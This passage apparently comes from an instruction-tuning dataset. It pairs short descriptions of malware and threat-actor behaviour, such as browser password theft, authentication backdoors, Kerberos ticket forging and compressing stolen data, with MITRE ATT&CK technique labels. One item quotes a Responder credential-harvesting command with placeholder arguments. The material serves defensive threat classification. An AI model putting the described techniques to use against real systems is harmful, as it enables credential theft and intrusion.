techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "WarzoneRAT has the capability to grab passwords from numerous web browsers as well as from Outlook and Thunderbird email clients.", + "output": "- T1555.003: Credentials from Password Stores - Credentials from Web Browsers" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "XAgentOSX contains the getFirefoxPassword function to attempt to locate Firefox passwords.", + "output": "- T1555.003: Credentials from Password Stores - Credentials from Web Browsers" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "RainyDay can use the QuarksPwDump tool to obtain local passwords and domain cached credentials.", + "output": "- T1555.004: Credentials from Password Stores - Windows Credential Manager" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "SILENTTRINITY can create a backdoor in KeePass using a malicious config file and in TortoiseSVN using a registry hook.", + "output": "- T1556: Modify Authentication Process" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "Chimera's malware has altered the NTLM authentication program on domain controllers to allow Chimera to login without a valid credential.", + "output": "- T1556.001: Modify Authentication Process - Domain Controller Authentication" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "Strider has registered its persistence module on domain controllers as a Windows LSA (Local System Authority) password filter to acquire credentials any time a domain, local user, or administrator logs in or changes a password.", + "output": "- T1556.002: Modify Authentication Process - Password Filter DLL" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "Ebury can deactivate PAM modules to tamper with the sshd configuration.", + "output": "- T1556.003: Modify Authentication Process - Pluggable Authentication Modules" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "Skidmap has the ability to replace the pam_unix.so file on an infected machine with its own malicious version that accepts a specific backdoor password for all users.", + "output": "- T1556.003: Modify Authentication Process - Pluggable Authentication Modules" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "SYNful Knock has the capability to add its own custom backdoor password when it modifies the operating system of the affected network device.", + "output": "- T1556.004: Modify Authentication Process - Network Device Authentication" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "APT29 has edited the `Microsoft.IdentityServer.Servicehost.exe.config` file to load a malicious DLL into the AD FS process, thereby enabling persistent access to any service federated with AD FS for a user with a specified User Principal Name.", + "output": "- T1556.007: Modify Authentication Process - Hybrid Identity" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "Dok proxies web traffic to potentially monitor and alter victim HTTP(S) traffic.", + "output": "- T1557: Adversary-in-the-Middle" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "Impacket modules like ntlmrelayx and smbrelayx can be used in conjunction with Network Sniffing and LLMNR/NBT-NS Poisoning and SMB Relay to gather NetNTLM credentials for Brute Force or relay attacks that can gain code execution.", + "output": "- T1557.001: Adversary-in-the-Middle - LLMNR/NBT-NS Poisoning and SMB Relay" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "\"Lazarus Group executed Responder using the command \"\"[Responder file path] -i [IP address] -rPv\"\" on a compromised host to harvest credentials and move laterally.\"", + "output": "- T1557.001: Adversary-in-the-Middle - LLMNR/NBT-NS Poisoning and SMB Relay" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "Wizard Spider has used the Invoke-Inveigh PowerShell cmdlets, likely for name service poisoning.", + "output": "- T1557.001: Adversary-in-the-Middle - LLMNR/NBT-NS Poisoning and SMB Relay" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "Empire can leverage its implementation of Mimikatz to obtain and use golden tickets.", + "output": "- T1558.001: Steal or Forge Kerberos Tickets - Golden Ticket" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "AADInternals can be used to forge Kerberos tickets using the password hash of the AZUREADSSOACC account.", + "output": "- T1558.002: Steal or Forge Kerberos Tickets - Silver Ticket" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "Empire can leverage its implementation of Mimikatz to obtain and use silver tickets.", + "output": "- T1558.002: Steal or Forge Kerberos Tickets - Silver Ticket" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "FIN7 has used Kerberoasting for credential access and to enable lateral movement.", + "output": "- T1558.003: Steal or Forge Kerberos Tickets - Kerberoasting" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "HyperStack can connect to the IPC$ share on remote machines.", + "output": "- T1559: Inter-Process Communication" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "\"Gamaredon Group malware can insert malicious macros into documents using a \"\"Microsoft.Office.Interop\"\" object.\"", + "output": "- T1559.001: Inter-Process Communication - Component Object Model" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "Ramsay can use the Windows COM API to schedule tasks and maintain persistence.", + "output": "- T1559.001: Inter-Process Communication - Component Object Model" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "RTM can search for specific strings within browser tabs using a Dynamic Data Exchange mechanism.", + "output": "- T1559.002: Inter-Process Communication - Dynamic Data Exchange" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "ADVSTORESHELL encrypts with the 3DES algorithm and a hardcoded key prior to exfiltration.", + "output": "- T1560: Archive Collected Data" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "Aria-body has used ZIP to compress data gathered on a compromised host.", + "output": "- T1560: Archive Collected Data" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "BloodHound can compress data collected by its SharpHound ingestor into a ZIP file to be written to disk.", + "output": "- T1560: Archive Collected Data" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "Cadelspy has the ability to compress stolen data into a .cab file.", + "output": "- T1560: Archive Collected Data" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "Chrommme can encrypt and store on disk collected data before exfiltration.", + "output": "- T1560: Archive Collected Data" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "Daserf hides collected data in password-protected .rar archives.", + "output": "- T1560: Archive Collected Data\n- T1560.001: Archive Collected Data - Archive via Utility" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "Gold Dragon encrypts data using Base64 before being sent to the command and control server.", + "output": "- T1560: Archive Collected Data" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "Kessel can RC4-encrypt credentials before sending to the C2.", + "output": "- T1560: Archive Collected Data" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "VERMIN encrypts the collected files using 3-DES.", + "output": "- T1560: Archive Collected Data" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "APT3 has used tools to compress data before exfilling it.", + "output": "- T1560.001: Archive Collected Data - Archive via Utility" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "APT39 has used WinRAR and 7-Zip to compress an archive stolen data.", + "output": "- T1560.001: Archive Collected Data - Archive via Utility" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "BRONZE BUTLER has compressed data into password-protected RAR archives prior to exfiltration.", + "output": "- T1560.001: Archive Collected Data - Archive via Utility" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "\"Calisto uses the \"\"zip -r\"\" command to compress the data collected on the local system.\"", + "output": "- T1560.001: Archive Collected Data - Archive via Utility" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "Chimera has used gzip for Linux OS and a modified RAR software to archive data on Windows hosts.", + "output": "- T1560.001: Archive Collected Data - Archive via Utility" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "Crutch has used the WinRAR utility to compress and encrypt stolen files.", + "output": "- T1560.001: Archive Collected Data - Archive via Utility" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "During Operation Honeybee, the threat actors uses zip to pack collected files before exfiltration.", + "output": "- T1560.001: Archive Collected Data - Archive via Utility" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "During Operation Wocao, threat actors archived collected files with WinRAR, prior to exfiltration.", + "output": "- T1560.001: Archive Collected Data - Archive via Utility" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "DustySky can compress files via RAR while staging data to be exfiltrated.", + "output": "- T1560.001: Archive Collected Data - Archive via Utility" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "IceApple can encrypt and compress files using Gzip prior to exfiltration.", + "output": "- T1560.001: Archive Collected Data - Archive via Utility" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "Octopus has compressed data before exfiltrating it using a tool called Abbrevia.", + "output": "- T1560.001: Archive Collected Data - Archive via Utility" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "PUNCHBUGGY has Gzipped information and saved it to a random temp file before exfil.", + "output": "- T1560.001: Archive Collected Data - Archive via Utility" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "PoetRAT has the ability to compress files with zip.", + "output": "- T1560.001: Archive Collected Data - Archive via Utility" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "PoshC2 contains a module for compressing data using ZIP.", + "output": "- T1560.001: Archive Collected Data - Archive via Utility" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "BADFLICK has compressed data using the aPLib compression library.", + "output": "- T1560.002: Archive Collected Data - Archive via Library" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "Epic compresses the collected data with bzip2 before sending it to the C2 server.", + "output": "- T1560.002: Archive Collected Data - Archive via Library" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "Gelsemium can compress embedded executables with the zlib library.", + "output": "- T1560.002: Archive Collected Data - Archive via Library" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "InvisiMole can use zlib to compress and decompress data.", + "output": "- T1560.002: Archive Collected Data - Archive via Library" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "Threat Group-3390 has used RAR to compress, encrypt, and password-protect files prior to exfiltration.", + "output": "- T1560.002: Archive Collected Data - Archive via Library" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "Agent.btz saves system information into an XML file that is then XOR-encoded.", + "output": "- T1560.003: Archive Collected Data - Archive via Custom Method" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this 